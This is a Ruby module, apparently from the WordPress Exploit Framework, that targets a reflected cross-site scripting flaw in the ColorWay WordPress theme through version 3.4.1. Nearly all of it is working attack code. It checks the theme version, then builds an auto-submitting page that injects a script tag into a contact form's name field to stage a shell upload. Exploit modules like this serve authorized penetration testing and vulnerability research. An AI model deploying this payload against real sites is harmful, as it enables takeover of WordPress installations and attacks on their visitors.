# frozen_string_literal: true

class Wpxf::Exploit::ColorwayReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::StagedReflectedXss

  def initialize
    super

    update_info(
      name: 'ColorWay <= 3.4.1 Reflected XSS Shell Upload',
      author: [
        'Yorick Koster', # Discovery and disclosure
        'rastating'      # WPXF module
      ],
      references: [
        ['WPVDB', '8568'],
        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html']
      ],
      date: 'Jul 26 2016'
    )

    register_option(
      StringOption.new(
        name: 'contact_url',
        desc: 'The URL of a contact form',
        required: true
      )
    )
  end

  def check
    check_theme_version_from_style('colorway', '3.4.2')
  end

  def initial_script
    %|<html><head></head><body><script>
      #{js_post}
      post('#{datastore['contact_url']}', {
        contactName: "\\"><script>#{xss_include_script}<\\/script>",
        email: '#{Utility::Text.rand_alpha(5)}',
        comments: '',
        submitted: 'true'
      });
    </script></body></html>
    |
  end
end
